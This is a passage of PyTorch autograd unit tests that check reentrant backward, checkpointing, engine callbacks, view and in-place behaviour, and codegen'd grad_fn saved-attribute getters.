def test_set_data_preserve_pyobj(self):
    # `dst.data = src` must keep dst's Python object identity intact.
    src = torch.randn(1, 2)
    dst = torch.randn(1, 2)
    dst_id_before = id(dst)
    dst.data = src
    self.assertTrue(dst_id_before == id(dst))
@unittest.skipIf(IS_WINDOWS, "Skipping because doesn't work for windows")
def test_thread_shutdown(self):
    """Running a backward in a subprocess must log the autograd
    thread-shutdown API-usage event on interpreter exit."""
    # NOTE(review): SOURCE arrived with all indentation stripped; the inner
    # indentation of this script string was reconstructed — verify against VCS.
    code = """import torch
from torch.autograd import Function
class MyFunction(Function):
    @staticmethod
    def forward(ctx, x):
        return x

    @staticmethod
    def backward(ctx, grad):
        return grad

for shape in [(1,), ()]:
    v = torch.ones(shape, requires_grad=True)
    MyFunction.apply(v).backward()
"""
    s = TestCase.runWithPytorchAPIUsageStderr(code)
    self.assertRegex(s, "PYTORCH_API_USAGE torch.autograd.thread_shutdown")
@unittest.skipIf(IS_MACOS, "Fails with SIGBUS on macOS; https://github.com/pytorch/pytorch/issues/25941")
def test_deep_reentrant(self):
    """Deeply nested reentrant backward must not overflow the stack."""
    class DeepReentrant(Function):
        @staticmethod
        def forward(ctx, x):
            # stash a fresh leaf holding x - 1 so backward can recurse on it
            with torch.enable_grad():
                ctx.x = Variable(x.detach(), requires_grad=True)
                ctx.x = ctx.x - 1
            return ctx.x.detach()

        @staticmethod
        def backward(ctx, x):
            # recurse until the stashed counter goes negative
            if ctx.x < 0:
                return x
            with torch.enable_grad():
                DeepReentrant.apply(ctx.x).sum().backward()
            return x

    # Test stack overflow escape mechanism
    v = torch.tensor(2000.0, requires_grad=True)
    # This will cause stack overflow if reentrant calls are handled
    # in the same thread recursively
    DeepReentrant.apply(v).sum().backward()

    # Test stack overflow escape mechanism multiple times
    # to ensure reusing workers in the pool works fine
    v2 = torch.tensor(200.0, requires_grad=True)
    DeepReentrant.apply(v2).sum().backward()
def test_reentrant_priority(self):
    """Reentrant backward tasks must run before already-queued outer tasks."""
    order = []

    class MyFunction(Function):
        @staticmethod
        def forward(ctx, x):
            return x

        @staticmethod
        def backward(ctx, x):
            order.append("MyFunction")
            return x

    class Reentrant(Function):
        @staticmethod
        def forward(ctx, x):
            # stash a fresh leaf holding x - 1 so backward can recurse on it
            with torch.enable_grad():
                ctx.x = Variable(x.detach(), requires_grad=True)
                ctx.x = ctx.x - 1
            return ctx.x.detach()

        @staticmethod
        def backward(ctx, x):
            order.append("Reentrant")
            if ctx.x < 0:
                return x
            with torch.enable_grad():
                Reentrant.apply(ctx.x).backward()
            return x

    a = MyFunction.apply(torch.tensor(6.0, requires_grad=True))
    b = Reentrant.apply(torch.tensor(9.0, requires_grad=True))
    v = a * b
    v.backward()

    # The tasks for the Reentrant and MyFunction backward() will be added
    # to the queue in the autograd engine at the same time. The backward
    # for Reentrant will be executed first, which will then add other
    # backward tasks to the queue. We want to ensure all the reentrant tasks
    # are prioritized over the MyFunction backward task regardless of their
    # sequence numbers
    self.assertEqual(len(order), 11)
    self.assertEqual(order.count("Reentrant"), 10)
    self.assertEqual(order[-1], "MyFunction")
@slowTest
def test_checkpointing(self):
    # Checkpoint many small forward passes and backprop through their mean.
    num_inp = 2000
    nz_inp = 10
    nz_out = 10
    nz_bottleneck = 1000

    # small proxy network for some complex reasoning we want to do per input
    net = nn.Sequential(
        nn.Linear(nz_inp, nz_bottleneck),
        nn.ReLU(),
        nn.Linear(nz_bottleneck, nz_inp)
    )

    def make_input():
        sample = torch.empty(1, nz_inp)
        sample.uniform_()
        sample.requires_grad = True
        return sample

    feat_combined = [checkpoint(net, make_input()) for _ in range(num_inp)]

    # compute mean as a proxy for some joint reasoning
    mean_combined = torch.stack(feat_combined).mean()
    mean_combined.backward()
def test_checkpoint_valid_reset_on_error(self):
    # After checkpoint + autograd.grad() fails, a subsequent
    # checkpoint + backward() must still succeed.
    a = torch.randn(2, 2, requires_grad=True)

    with self.assertRaisesRegex(Exception, "Checkpointing is not compatible with .grad()"):
        bad_sum = checkpoint(torch.exp, a).sum()
        torch.autograd.grad(bad_sum, (a,))

    ok_sum = checkpoint(torch.exp, a).sum()
    ok_sum.backward()
def test_callback_adds_callback(self):
    """A callback queued from within another engine callback still runs."""
    called = [0]

    def callback_final():
        called[0] += 1

    def callback_adds_callback():
        called[0] += 1
        # queue a second callback from inside the first one
        Variable._execution_engine.queue_callback(callback_final)

    class MyFunc(Function):
        @staticmethod
        def forward(ctx, input):
            return input

        @staticmethod
        @once_differentiable
        def backward(ctx, grad):
            # queue the first callback from inside backward
            Variable._execution_engine.queue_callback(callback_adds_callback)
            return grad

    a = torch.rand((3, 3), requires_grad=True)
    b = MyFunc.apply(a)
    b.sum().backward()

    self.assertEqual(called[0], 2)
def _test_reentrant_with_callbacks(self, install_callbacks_in_depths):
    """Run a reentrant backward, installing engine callbacks at the given
    nesting depths (0 = outer backward, 1 = reentrant backward).

    Returns a dict with the number of times each callback fired.
    """
    counter = {}
    counter["inner"] = 0
    counter["outer"] = 0

    def inc_inner_counter():
        counter["inner"] += 1

    def inc_outer_counter():
        counter["outer"] += 1

    class MyFunc(Function):
        @staticmethod
        def forward(ctx, input):
            return input

        @staticmethod
        @once_differentiable
        def backward(ctx, input):
            if 1 in install_callbacks_in_depths:
                # Add a callback to execute.
                Variable._execution_engine.queue_callback(inc_inner_counter)
            return input

    class MyReentrantFunc(Function):
        @staticmethod
        def forward(ctx, input):
            return input

        @staticmethod
        @once_differentiable
        def backward(ctx, input):
            if 0 in install_callbacks_in_depths:
                # Add a callback to execute.
                Variable._execution_engine.queue_callback(inc_outer_counter)
            # Reentrant backward call.
            tmp_inp = input.detach().requires_grad_()
            with torch.enable_grad():
                tmp_out = (MyFunc.apply(tmp_inp)).sum()
            tmp_out.backward()
            return input

    t1 = torch.rand((3, 3), requires_grad=True)
    t2 = MyReentrantFunc.apply(t1)
    t3 = t2.sum()
    torch.autograd.backward([t3])

    return counter
def test_reentrant_with_callbacks_depth_0(self):
    # Verify callback is called only once.
    counts = self._test_reentrant_with_callbacks([0])
    self.assertEqual(1, counts["outer"])
    self.assertEqual(0, counts["inner"])
def test_reentrant_with_callbacks_depth_1(self):
    """A callback installed at reentrant depth 1 fires exactly once."""
    counters = self._test_reentrant_with_callbacks([1])
    self.assertEqual(0, counters["outer"])
    self.assertEqual(1, counters["inner"])
def test_reentrant_with_callbacks_both_depths(self):
    """Callbacks installed at both depths each fire exactly once."""
    counters = self._test_reentrant_with_callbacks([0, 1])
    self.assertEqual(1, counters["outer"])
    self.assertEqual(1, counters["inner"])
def test_reentrant_with_leaf_variable_hook(self):
    """A hook on a *leaf* tensor may run a reentrant backward without deadlocking."""
    handle = None
    param = torch.rand(10, requires_grad=True)

    def add_gradient_penalty_to_grad(grad):
        # Remove the hook so the nested backward below does not re-enter it.
        handle.remove()
        old_param_grad = grad
        param.grad = None
        # Add some sort of gradient penalty by directly updating the gradients
        with torch.enable_grad():
            g = grad.detach().requires_grad_()
            new_param = param.detach().requires_grad_()
            out = ((g * 2) + new_param).sum()
            out.backward()
        res = g.grad + grad
        param.grad = old_param_grad
        return res

    handle = param.register_hook(add_gradient_penalty_to_grad)
    # Forward pass
    tmp = (param * param)
    loss = tmp.sum()
    # Compute the gradients
    loss.backward()
def test_reentrant_with_non_leaf_variable_hook(self):
    """A hook on a *non-leaf* tensor may run a reentrant backward without deadlocking."""
    handle = None
    param = torch.rand(10, requires_grad=True)

    def manual_increase_gradient(grad):
        # Remove the hook so the nested backward below does not re-enter it.
        handle.remove()
        # Add some sort of gradient penalty by directly updating the gradients
        with torch.enable_grad():
            g = grad.detach().requires_grad_()
            out = ((g * 2) + 5).sum()
            out.backward()
        # g.grad is d(out)/dg == 2, so the hook rescales the incoming grad of
        # ones to threes; param.grad becomes 3 * d(param*param)/d(param).
        res = g.grad + grad
        return res

    # Forward pass
    tmp = (param * param)
    handle = tmp.register_hook(manual_increase_gradient)
    loss = tmp.sum()
    # Compute the gradients
    loss.backward()
    self.assertEqual(param.grad, 6 * param)
def test_grad_fn_attr_bindings(self):
    """Smoke-test the codegen'd ``grad_fn._saved_*`` attribute getters.

    Check that the getter of each saved-field C++ type returns the expected
    Python value/type.  See `gen_autograd_functions.py` for how the getters
    are generated.  This test is only meant to check if the codegen'd
    bindings work.  Please help update this test if you update the names of
    any the fields we check!
    """
    a = torch.ones(1, requires_grad=True)
    b = torch.ones(1, requires_grad=True)
    out = torch.stack([a, b], dim=0)
    self.assertEqual(out.grad_fn._saved_tensors, (a, b))  # TensorList -> Tuple[Tensor]
    self.assertIsInstance(out.grad_fn._saved_tensors[0], torch.Tensor)
    self.assertEqual(out.grad_fn._saved_dim, 0)  # int64_t -> int
    self.assertIsInstance(out.grad_fn._saved_dim, int)

    out.sum().backward()
    # Saved tensors are released after backward(); accessing them raises ...
    with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
        out.grad_fn._saved_tensors
    # ... but non-tensor saved fields remain readable.
    self.assertEqual(out.grad_fn._saved_dim, 0)

    a = torch.ones(2, 2, requires_grad=True)
    indices = torch.tensor([0, 1])
    out = a[:, indices]
    self.assertEqual(out.grad_fn._saved_indices, (None, indices))  # c10::List<c10::optional<Tensor>> -> Tuple[Tensor?]
    self.assertIsInstance(out.grad_fn._saved_indices[1], torch.Tensor)
    self.assertEqual(out.grad_fn._saved_self_sizes, a.shape)  # IntArrayRef -> Tuple[int]
    self.assertIsInstance(out.grad_fn._saved_self_sizes[0], int)

    a = torch.ones(1, 1, 2, requires_grad=True)
    out = torch.nn.functional.interpolate(a, 4, mode="linear")
    self.assertEqual(out.grad_fn._saved_output_size, (4,))  # c10::optional<IntArrayRef> -> int[]?
    self.assertIsInstance(out.grad_fn._saved_output_size[0], int)
    self.assertEqual(out.grad_fn._saved_align_corners, False)  # bool -> bool
    self.assertIsInstance(out.grad_fn._saved_align_corners, bool)
    self.assertIsNone(out.grad_fn._saved_scale_factors)  # c10::optional<ArrayRef<double>> -> float[]?

    out = torch.nn.functional.interpolate(a, scale_factor=0.5, mode="linear")
    self.assertIsNone(out.grad_fn._saved_output_size)
    self.assertEqual(out.grad_fn._saved_scale_factors, (0.5,))
    self.assertIsInstance(out.grad_fn._saved_scale_factors[0], float)

    a = torch.ones(2, 2, requires_grad=True)
    out = torch.pdist(a, p=1)
    self.assertEqual(out.grad_fn._saved_p, 1.)  # double -> float
    self.assertIsInstance(out.grad_fn._saved_p, float)

    a = torch.ones(1, 1, 2, requires_grad=True)
    out = torch.logit(a, 1.)
    self.assertEqual(out.grad_fn._saved_eps, 1.)  # c10:optional<double> -> float?
    self.assertIsInstance(out.grad_fn._saved_eps, float)
    out = torch.logit(a)
    self.assertIsNone(out.grad_fn._saved_eps)

    # qr requires LAPACK support, which is build-dependent.
    if torch._C.has_lapack:
        a = torch.ones(1, 1, requires_grad=True)
        q, r = torch.linalg.qr(a, mode="reduced")
        self.assertEqual(q.grad_fn._saved_mode, "reduced")  # std::string -> str

    a = torch.tensor([1.], requires_grad=True)
    out = torch.div(a, 2., rounding_mode="trunc")
    self.assertEqual(out.grad_fn._saved_rounding_mode, "trunc")  # c10::optional<std::string> -> str?
    out = torch.div(a, 2., rounding_mode=None)
    self.assertIsNone(out.grad_fn._saved_rounding_mode)  # c10::optional<std::string> -> str?

    x = torch.zeros(5, requires_grad=True)
    out = torch.threshold(x, threshold=(1 + 0j), value=(1 + 0j))
    self.assertIsInstance(out.grad_fn._saved_threshold, complex)  # Scalar(complex double) -> complex
    cfloat = torch.tensor(1 + 0j, dtype=torch.complex64)
    out = torch.threshold(x, threshold=cfloat, value=(1 + 0j))
    self.assertIsInstance(out.grad_fn._saved_threshold, complex)  # Scalar(complex float) -> complex
    out = torch.threshold(x, threshold=1., value=1.)
    self.assertIsInstance(out.grad_fn._saved_threshold, float)  # Scalar(floating point) -> float
    out = torch.threshold(x, threshold=1, value=1)
    self.assertIsInstance(out.grad_fn._saved_threshold, int)  # Scalar(integral) -> int
    out = torch.threshold(x, threshold=False, value=False)
    self.assertIsInstance(out.grad_fn._saved_threshold, bool)  # Scalar(bool) -> bool

    a = torch.ones(2, 2, requires_grad=True)
    out = a.as_strided((3,), (1,), 1)
    self.assertEqual(out.grad_fn._saved_storage_offset, 1)  # c10:optional<int64_t> -> int?
    self.assertIsInstance(out.grad_fn._saved_storage_offset, int)
    out = a.as_strided((3,), (1,))
    self.assertIsNone(out.grad_fn._saved_storage_offset)

    a = torch.ones(2, requires_grad=True)
    out = torch.tanh(a)
    self.assertEqual(out, out.grad_fn._saved_result)  # saved variable when output

    a = torch.randn(3, 5, requires_grad=True)
    b = torch.tensor([1, 0, 4])
    loss = nn.NLLLoss()
    out = loss(a, b)
    self.assertIsNone(out.grad_fn._saved_weight)
    loss = nn.NLLLoss(weight=torch.ones((5,)))
    out = loss(a, b)
    self.assertEqual(out.grad_fn._saved_weight, torch.ones((5,)))  # c10:optional<Tensor> -> Tensor?

    out.sum().backward()
    with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
        out.grad_fn._saved_weight
def test_autograd_views_codegen(self):
    """Pin the current view-tracking/inplace behavior of view_as and unbind.

    This is not necessarily the absolute correct behavior, but this is the
    current one.  This test is here to make sure that any change to this
    behavior is detected and not silent.  Note that any change in these
    tests will be BC-breaking and should be done carefully.
    """
    def run_test(grad_mode, requires_grad, is_view, should_raise_tuple):
        def maybe_check_raise(fn, should_raise):
            self.assertTrue(should_raise is None or isinstance(should_raise, str))
            if should_raise is not None:
                with self.assertRaisesRegex(RuntimeError, should_raise):
                    fn()
            else:
                fn()

        inp = torch.rand(2, requires_grad=requires_grad).clone()
        with torch.set_grad_enabled(grad_mode):
            out = inp.view_as(inp)
        # Are they differentiable views?
        self.assertTrue(out._is_view() == is_view)
        # Are inplace allowed?
        maybe_check_raise(lambda: out.add_(1), should_raise_tuple[0])

        inp = torch.rand(2, requires_grad=requires_grad).clone()
        with torch.set_grad_enabled(grad_mode):
            out = inp.unbind()
        # Are they differentiable views?
        self.assertTrue(out[0]._is_view() == is_view)
        self.assertTrue(out[1]._is_view() == is_view)
        # Are inplace allowed?
        maybe_check_raise(lambda: out[0].add_(1), should_raise_tuple[1])
        maybe_check_raise(lambda: out[1].add_(1), should_raise_tuple[2])

    # should_raise contains None if it should not raise
    # should_raise contains a string of the error if it should raise
    # The 3 elements are for view_as, first output of unbind and second output of unbind
    run_test(grad_mode=True, requires_grad=False, is_view=True,
             should_raise_tuple=(None, None, None))
    inp_change_err = "Output {} of UnbindBackward is a view and is being modified inplace."
    run_test(grad_mode=True, requires_grad=True, is_view=True,
             should_raise_tuple=(None, inp_change_err.format("0"), inp_change_err.format("1")))
    leaf_grad_err = "A view was created in no_grad mode and is being modified inplace"
    run_test(grad_mode=False, requires_grad=True, is_view=True,
             should_raise_tuple=(leaf_grad_err, leaf_grad_err, leaf_grad_err))
    run_test(grad_mode=False, requires_grad=False, is_view=True,
             should_raise_tuple=(None, None, None))
def test_inplace_not_requires_grad(self):
    """Inplace writes of a grad-requiring tensor onto invalid views must raise."""
    class MyFn(torch.autograd.Function):
        @staticmethod
        def forward(ctx, inp):
            return inp.view_as(inp)

        @staticmethod
        def backward(ctx, grad):
            return grad

    # Original Tensor does not require grad
    a = torch.rand(1, 2)

    # Tensor being written does require grad
    b = torch.rand(1, requires_grad=True)

    # Take an invalid view on 'a' that should raise an error (warns during deprecation)
    view_a = MyFn.apply(a)

    with self.assertRaisesRegex(RuntimeError, "This view was created inside a custom Function"):
        view_a += b

    # Extra test for copy_ that is a manual implementation and could be easily
    # forgotten when the codegen is updated (warns during deprecation)
    a = torch.rand(1, 2)
    b = torch.rand(1, requires_grad=True)
    view_a = MyFn.apply(a)

    with self.assertRaisesRegex(RuntimeError, "This view was created inside a custom Function"):
        view_a.copy_(b)

    # Functions that should throw must properly throw
    a = torch.rand(1, 2)
    b = torch.rand(1, requires_grad=True)
    view_a = a.unbind()[0]
    with self.assertRaisesRegex(RuntimeError, "This view is the output of a function that returns "
                                "multiple views."):
        view_a.copy_(b)

    # Sanity check that views that should work still work
    a = torch.rand(1, 2)
    b = torch.rand(1, requires_grad=True)
    a.select(1, 0).copy_(b)
def _do_test_autograd_simple_views_python(self, dtype):
    """Exercise custom Functions whose outputs are inputs or views, per dtype.

    This is not necessarily the absolute correct behavior, but this is the
    current one.  This test is here to make sure that any change to this
    behavior is detected and not silent.  This checks the autograd.Function
    behavior when we return one or multiple outputs while one of these is
    an input, a view of an input or of a temporary tensor.
    """
    # This indicator is used to track how many times the backward function was called
    bw_called = [0]
    # This indicator is used to check if the argument `ga` contains non-zero values
    ga_nz = [False]

    class IdOneOutput(Function):
        @staticmethod
        def forward(ctx, a, b, make_view):
            if make_view:
                a = a.narrow(0, 0, 2)
            else:
                a = a.clone()
            return a

        @staticmethod
        def backward(ctx, ga):
            bw_called[0] += 1
            return ga, None, None

    class IdTwoOutput(Function):
        @staticmethod
        def forward(ctx, a, b, make_view):
            if make_view:
                a = a.narrow(0, 0, 2)
            else:
                a = a.clone()
            return a, a + b

        @staticmethod
        def backward(ctx, ga, gab):
            bw_called[0] += 1
            if ga.eq(0).all():
                ga_nz[0] = False
            else:
                ga_nz[0] = True
            return ga + gab, gab, None

    class ViewOfTemp(Function):
        @staticmethod
        def forward(ctx, a, make_view):
            ctx.save_for_backward(a)
            if make_view:
                a = a.narrow(0, 0, 2)
            else:
                a = a.clone()
            b = a.clone()
            return b.select(0, 0)

        @staticmethod
        def backward(ctx, grad):
            bw_called[0] += 1
            a, = ctx.saved_tensors
            res = torch.zeros_like(a)
            res.select(0, 0).copy_(grad)
            return res, None

    fn_id_to_inplace_on_view_err_msg = {
        "one_output": ("Output 0 of IdOneOutputBackward is a view and is being "
                       "modified inplace. This view was created inside a custom Function"),
        "two_output": ("Output 0 of IdTwoOutputBackward is a view and is being modified inplace."
                       " This view is the output of a function that returns multiple views."),
        "view_of_temp": ("Output 0 of ViewOfTempBackward is a view and is being "
                         "modified inplace. This view was created inside a custom Function")
    }

    for fn_id in ["one_output", "two_output", "view_of_temp"]:
        for inplace in [True, False]:
            for make_view in [True, False]:
                # Used for special casing the tests below
                output_is_a_view = (make_view or fn_id == "view_of_temp")

                def fn(a, b):
                    # never modify a, b inplace for gracheck
                    a = a.clone()
                    b = b.clone()
                    if fn_id == "two_output":
                        tmp1, tmp2 = IdTwoOutput.apply(a, b, make_view)
                        if inplace:
                            tmp1 += 3
                            tmp2 += 3
                        else:
                            tmp1 = tmp1 + 3
                            tmp2 = tmp2 + 3
                        tmp = tmp1 * tmp2
                    else:
                        if fn_id == "one_output":
                            tmp = IdOneOutput.apply(a, b, make_view)
                        else:
                            tmp = ViewOfTemp.apply(a + b, make_view)
                        if inplace:
                            tmp += 3
                        else:
                            tmp = tmp + 3
                    return tmp.sum()

                a = torch.ones(2, dtype=dtype, requires_grad=True)
                b = torch.ones(2, dtype=dtype, requires_grad=True)

                err_msg = fn_id_to_inplace_on_view_err_msg[fn_id]

                # Inplace on a returned view raises, so only gradcheck the
                # combinations that can actually run.
                if not inplace or not output_is_a_view:
                    gradcheck(fn, (a, b), check_batched_grad=False)

                # Was the custom backward called properly
                bw_called[0] = 0
                ga_nz[0] = True  # For the case where the backward is called

                if inplace and output_is_a_view:
                    with self.assertRaisesRegex(RuntimeError, err_msg):
                        fn(a, b)
                else:
                    fn(a, b).backward()

                expected_called = 1
                expected_ga_nz = True

                if output_is_a_view and inplace:
                    expected_called = 0

                self.assertTrue(bw_called[0] == expected_called)
                self.assertTrue(ga_nz[0] == expected_ga_nz)
def test_autograd_simple_views_python(self):
    """Run the simple-views checks for both real and complex double dtypes."""
    for dtype in (torch.double, torch.cdouble):
        self._do_test_autograd_simple_views_python(dtype)
def test_autograd_inplace_views_creation_meta(self):
    """Tests creation_meta is properly handled for inplace views."""
    class Func(torch.autograd.Function):
        @staticmethod
        def forward(ctx, x):
            return x.view_as(x)

        @staticmethod
        def backward(ctx, x):
            return x

    view_custom = Func.apply

    def run_test(fn, fn_type, grad_mode_view, grad_mode_iview, requires_grad, error1, error2):
        # This test checks the behavior of inplace-view functions when
        # the views are created in grad mode or not
        base = torch.rand(2, 3, requires_grad=requires_grad).clone()
        # 1. Create a view with `grad_mode=grad_mode_view`
        with torch.set_grad_enabled(grad_mode_view):
            if fn_type == "multi_view":
                inp = base.unbind()[0]
            elif fn_type == "custom" :
                inp = view_custom(base)
            else:
                inp = base.view_as(base)

        # 2. Perform inplace view with `grad_mode=grad_mode_iview`
        with torch.set_grad_enabled(grad_mode_iview):
            if error1 is not None:
                with self.assertRaisesRegex(RuntimeError, error1):
                    fn(inp)
                return
            else:
                # If error is None, check that runs without error
                fn(inp)
        # 3. Do inplace on the (new) view
        if error2 is not None:
            with self.assertRaisesRegex(RuntimeError, error2):
                inp.add_(1)
        else:
            # If error is None, check that runs without error
            inp.add_(1)

    no_grad_err = "A view was created in no_grad mode"
    multi_view_err = "function that returns multiple views"
    custom_err = "view was created inside a custom Function"

    def run_tests(fn):
        # Sweep every combination of view kind, grad mode at view creation,
        # grad mode at the inplace-view op, and requires_grad of the base.
        for fn_type in ("normal", "multi_view", "custom"):
            for grad_mode_view in (True, False):
                for grad_mode_iview in (True, False):
                    for requires_grad in (True, False):
                        error1 = None  # expected error when we do inplace_view on original view
                        error2 = None  # expected error when we do inplace on the resulting view

                        if requires_grad:
                            if not grad_mode_view and grad_mode_iview:
                                error1 = no_grad_err
                            if not grad_mode_view and not grad_mode_iview:
                                error2 = no_grad_err

                            if fn_type == "multi_view":
                                if grad_mode_view and grad_mode_iview:
                                    error1 = multi_view_err
                                if grad_mode_view and not grad_mode_iview:
                                    error2 = multi_view_err

                            if fn_type == "custom":
                                if grad_mode_view and grad_mode_iview:
                                    error1 = custom_err
                                if grad_mode_view and not grad_mode_iview:
                                    error2 = custom_err

                        run_test(fn, fn_type, grad_mode_view, grad_mode_iview, requires_grad, error1, error2)

    # This list was created by logging gen_inplace_or_view_type.py
    # detach_ is excluded for this test because it cannot be applied to
    # views and thus does not return a view
    run_tests(lambda v: v.as_strided_((1, 0), (2, 2)))
    run_tests(lambda v: v.transpose_(0, 0))
    run_tests(lambda v: v.t_())
    run_tests(lambda v: v.squeeze_(0))
    run_tests(lambda v: v.unsqueeze_(0))
    run_tests(lambda v: v.swapdims_(0, 0))
    run_tests(lambda v: v.swapaxes_(0, 0))
# TODO This is not the correct behavior -
# See https://github.com/pytorch/pytorch/issues/49825#issuecomment-794466627
def test_autograd_inplace_views_cross_dtype(self):
    """Pin the (buggy) gradient of an inplace transpose on a view_as_real view.

    This test is here to make sure that any change to this behavior is
    detected and not silent.
    """
    # Reference: out-of-place transpose of the real view.
    a_orig = torch.rand(3, 3, requires_grad=True, dtype=torch.complex64)
    a = a_orig.clone()
    b = torch.view_as_real(a)
    b = b.transpose(0, 1)
    b += 1
    b.backward(torch.arange(0, 18, dtype=torch.float).view(3, 3, 2))
    non_inplace_grad = a_orig.grad

    # Same computation, but with an inplace transpose on the real view.
    a_orig = torch.rand(3, 3, requires_grad=True, dtype=torch.complex64)
    a = a_orig.clone()
    b = torch.view_as_real(a)
    b.transpose_(0, 1)
    b += 1
    b.backward(torch.arange(0, 18, dtype=torch.float).view(3, 3, 2))
    inplace_grad = a_orig.grad

    # TODO: this is a bug!
    # once this is fixed, it should have the transpose removed:
    # self.assertTrue(torch.allclose(non_inplace_grad, inplace_grad))
    self.assertEqual(non_inplace_grad.T, inplace_grad)
def test_autograd_multiple_views_python(self):
    """Check custom Functions that create several views during forward.

    This is not necessarily the absolute correct behavior, but this is the
    current one.  This test is here to make sure that any change to this
    behavior is detected and not silent.  This checks that multiples views
    in the forward are properly traced and how they behave with respect to
    inplace operations.
    """
    # This indicator is used to track how many times the backward function was called
    bw_called = [0]

    class ComplexView(Function):
        @staticmethod
        def forward(ctx, a, idx):
            # NOTE(review): the narrow() result is immediately overwritten by
            # select() — presumably intentional so that forward creates two
            # views of `a`; confirm before simplifying.
            res = a.narrow(0, idx, 1)
            res = a.select(0, idx)
            ctx.save_for_backward(a)
            ctx.idx = idx
            return res

        @staticmethod
        def backward(ctx, grad):
            bw_called[0] += 1
            a, = ctx.saved_tensors
            res = torch.zeros_like(a)
            res.select(0, ctx.idx).copy_(grad)
            return res, None

    a = torch.ones(2, requires_grad=True)
    idx = 1

    bw_called[0] = 0
    out = ComplexView.apply(a.clone(), idx)
    out.sum().backward()
    self.assertTrue(bw_called[0] == 1)

    out = ComplexView.apply(a.clone(), idx)
    with self.assertRaisesRegex(RuntimeError,
                                "Output 0 of ComplexViewBackward is a view and is being modified inplace"):
        out += 1
def test_autograd_python_custom_function_inplace(self):
    """Check custom autograd.Functions that perform inplace operations.

    This is not necessarily the absolute correct behavior, but this is the
    current one.  This test is here to make sure that any change to this
    behavior is detected and not silent.
    """
    bw_called = [0]

    # I) Single output
    class MyAdder(Function):
        @staticmethod
        def forward(ctx, a, b):
            a.add_(b)
            ctx.mark_dirty(a)
            return a

        @staticmethod
        def backward(ctx, grad):
            bw_called[0] += 1
            return grad, grad

    a = torch.ones(2, requires_grad=True)
    b = torch.ones(2, requires_grad=True)

    # No extra inplace
    c = MyAdder.apply(a.clone(), b)
    c.sum().backward()
    self.assertTrue(bw_called[0] == 1)

    # With extra inplace on the output
    bw_called[0] = 0
    c = MyAdder.apply(a.clone(), b)
    c += 2
    c.sum().backward()
    self.assertTrue(bw_called[0] == 1)

    # The input is a view
    bw_called[0] = 0
    c = MyAdder.apply(a.clone().view_as(a), b)
    c.sum().backward()
    self.assertTrue(bw_called[0] == 1)

    # Should not give non-inputs to mark_dirty
    class MyAdderBad(Function):
        @staticmethod
        def forward(ctx, a, b):
            c = 3 * a
            c.add_(b)
            ctx.mark_dirty(c)
            return c

        @staticmethod
        def backward(ctx, grad):
            bw_called[0] += 1
            grad = 3 * grad
            return grad, grad

    a = torch.ones(2, requires_grad=True)
    b = torch.ones(2, requires_grad=True)

    # Marking a non-input dirty currently warns rather than errors.
    with warnings.catch_warnings(record=True) as w:
        MyAdderBad.apply(a.clone(), b)
    self.assertEqual(len(w), 1)

    # II) Multiple outputs
    class MyBadAdder(Function):
        @staticmethod
        def forward(ctx, a, b):
            a.add_(b)
            ctx.mark_dirty(a)
            return a, a + b

        @staticmethod
        def backward(ctx, ga, gab):
            bw_called[0] += 1
            return ga + gab, ga + gab

    # No extra inplace
    bw_called[0] = 0
    c, d = MyBadAdder.apply(a.clone(), b)
    (c * d).sum().backward()
    self.assertTrue(bw_called[0] == 1)

    # With extra inplace on the output
    bw_called[0] = 0
    c, d = MyBadAdder.apply(a.clone(), b)
    c += 2
    (c * d).sum().backward()
    self.assertTrue(bw_called[0] == 1)

    # The input is a view
    inplace_on_view_err = "your Function modifies inplace an input that is a view of another Tensor"
    with self.assertRaisesRegex(RuntimeError, inplace_on_view_err):
        c, d = MyBadAdder.apply(a.clone().view_as(a), b)

    # III) Inplace + other op
    class MyOutPlaceAdder(Function):
        @staticmethod
        def forward(ctx, a, b):
            a.add_(b)
            ctx.mark_dirty(a)
            return a.clone(), a + b

        @staticmethod
        def backward(ctx, ga, gab):
            bw_called[0] += 1
            return ga + gab, ga + 2 * gab

    # We don't reuse the input
    def fn(a, b):
        orig_a = a.clone().view_as(a)
        c, d = MyOutPlaceAdder.apply(orig_a, b)
        return (c * d).sum()

    bad_mark_dirty_err = "Some elements marked as dirty during the forward method were not returned as output."
    with self.assertRaisesRegex(RuntimeError, bad_mark_dirty_err):
        fn(a, b)
def test_named_tensor_for_complex_views(self):
    """Autograd flows through view_as_complex built from a named tensor."""
    dims = ["batch", "height", "width", "complex"]
    base = torch.ones((5, 12, 14, 2), requires_grad=True)
    named = base.refine_names(*dims)
    # Drop names to build the complex view, then restore all but the
    # trailing "complex" dimension (absorbed into the complex dtype).
    as_complex = torch.view_as_complex(named.rename(None)).refine_names(*dims[:-1])
    as_complex.sum().backward()
    expected = torch.view_as_real(torch.ones_like(as_complex).rename(None))
    self.assertEqual(base.grad, expected)
def test_custom_function_return_view_in_nograd(self):
    """A custom Function returning a view under no_grad acts like a builtin view op."""
    class Alias(Function):
        @staticmethod
        def forward(ctx, x):
            return x[:]

        @staticmethod
        def backward(ctx, gx):
            return gx

    inp = torch.rand(2, requires_grad=True)

    with torch.no_grad():
        output = Alias.apply(inp)

    with torch.no_grad():
        expected_output = inp[:]

    # Calling the custom function should operate as if we called an equivalent op
    self.assertEqual(output.requires_grad, expected_output.requires_grad)

    # Check that in-place modification on view throws
    leaf_grad_err = "A view was created in no_grad mode and is being modified inplace"
    with self.assertRaisesRegex(RuntimeError, leaf_grad_err):
        output.zero_()
def test_grad_mode_restored_reentrant(self):
    """Grad mode is restored to its entry value around a reentrant backward."""
    class MyFunction(Function):
        @staticmethod
        def forward(ctx, inp):
            return inp.clone()

        @staticmethod
        def backward(ctx, go):
            # Record the grad mode this backward started with ...
            original = torch._C.is_grad_enabled()
            with torch.enable_grad():
                self.assertTrue(torch._C.is_grad_enabled())
                foo = torch.rand(go.size(), requires_grad=True)
                grad, = torch.autograd.grad(
                    foo ** 3, foo, grad_outputs=go
                )
                self.assertTrue(torch._C.is_grad_enabled())
            # ... and check the reentrant grad() call did not clobber it.
            self.assertTrue(torch._C.is_grad_enabled() == original)
            return grad

    inp = torch.rand(3, requires_grad=True)

    # Case where original==False
    MyFunction.apply(inp).sum().backward()
    # Case where original==True
    MyFunction.apply(inp).sum().backward(create_graph=True)
def test_power_function(self):
    """Gradient of pow with a zero base: b.grad is [-inf, 0, 0] for b=[-1, 0, 1]."""
    a = torch.tensor([0., 0., 0.])
    b = torch.tensor([-1., 0., 1.], requires_grad=True)
    c = torch.sum(a**b)
    c.backward()
